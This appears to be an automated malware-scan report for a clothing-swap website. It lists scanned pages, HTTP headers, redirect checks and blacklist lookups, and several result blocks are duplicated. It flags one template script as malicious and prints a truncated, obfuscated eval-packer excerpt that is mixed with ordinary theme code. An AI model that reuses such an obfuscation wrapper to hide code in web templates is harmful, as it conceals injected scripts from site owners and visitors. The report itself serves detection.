Scanned pages/files
| Request | Server response | Status |
http://dress-cross.com/ | 200 OK Content-Length: 71907 Content-Type: text/html | clean |
http://dress-cross.com/plugins/system/cdscriptegrator/libraries/highslide/js/highslide-full.min.js | 200 OK Content-Length: 71530 Content-Type: application/x-javascript | clean |
http://dress-cross.com/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://dress-cross.com/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js | 200 OK Content-Length: 20 Content-Type: application/x-javascript | clean |
http://dress-cross.com/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jquery-ui-1.8.2.custom.min.js | 200 OK Content-Length: 206991 Content-Type: application/x-javascript | clean |
http://dress-cross.com/media/system/js/caption.js | 200 OK Content-Length: 7233 Content-Type: application/x-javascript | clean |
http://dress-cross.com/plugins/content/rusbuttons/odkl_share.js | 200 OK Content-Length: 5936 Content-Type: application/x-javascript | clean |
http://dress-cross.com/modules/mod_jv_headline/assets/js/jvheadline.js | 200 OK Content-Length: 16647 Content-Type: application/x-javascript | clean |
http://dress-cross.com/templates/yoo_pinboard/lib/js/template.js.php | 200 OK Content-Length: 15432 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1a={19:6(15,s,r){3 9=0;3 n=[];3 q=15.18(" ");3 I=q.1b();3 u=\'\';q.g(6(8,i){u+=\'.t("\'+8+\'")\'});$1c(I).g(6(m,i){1e(\'n.17(m\'+u+\');\')});n.g(6(4,i){7(!$o(4))1 YOOBase.matchDivHeight('div.mainbottombox div.deepest', 0, 40); YOOBase.matchDivHeight('div.contenttopbox div.deepest', 0, 40); YOOBase.matchDivHeight('div.contentbottombox div.deepest', 0, 40); } }; window.addEvent('domready', YOOTools.start); if (window.ie6) { YOOTools.include('addons/ie6fix.js'); YOOTools.include('addons/ie6png.js'); YOOTools.include('yoo_ie6fix.js'); } Antivirus reports:
| ||
http://dress-cross.com/calendar/7-kalendar-meroprijatij-dresskrossing-menjatsja-modno | 200 OK Content-Length: 62168 Content-Type: text/html | clean |
http://dress-cross.com/specpredlozhenija-i-akcii | 200 OK Content-Length: 48808 Content-Type: text/html | clean |
http://dress-cross.com/vakansii | 200 OK Content-Length: 25513 Content-Type: text/html | clean |
http://dress-cross.com/abonementy-na-dresskrossing | 200 OK Content-Length: 14490 Content-Type: text/html | clean |
http://dress-cross.com/home | 200 OK Content-Length: 71947 Content-Type: text/html | clean |
http://dress-cross.com/what-is | 200 OK Content-Length: 40933 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dress-cross.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 15 Aug 2014 09:58:17 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 15 Aug 2014 09:58:17 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f1db7175e8fcf4764811ca3e52aa820d=e78290e605487a6cf22dd08e61ceb218; path=/
Set-Cookie: virtuemart=e78290e605487a6cf22dd08e61ceb218
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: dress-cross.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 15 Aug 2014 09:58:17 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 15 Aug 2014 09:58:17 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f1db7175e8fcf4764811ca3e52aa820d=e78290e605487a6cf22dd08e61ceb218; path=/
Set-Cookie: virtuemart=e78290e605487a6cf22dd08e61ceb218
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: dress-cross.com
Referer: http://www.google.com/search?q=dress-cross.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dress-cross.com
Referer: http://www.google.com/search?q=dress-cross.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dress-cross.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dress-cross.com/
Result: dress-cross.com is not infected or malware details are not published yet.
Result: dress-cross.com is not infected or malware details are not published yet.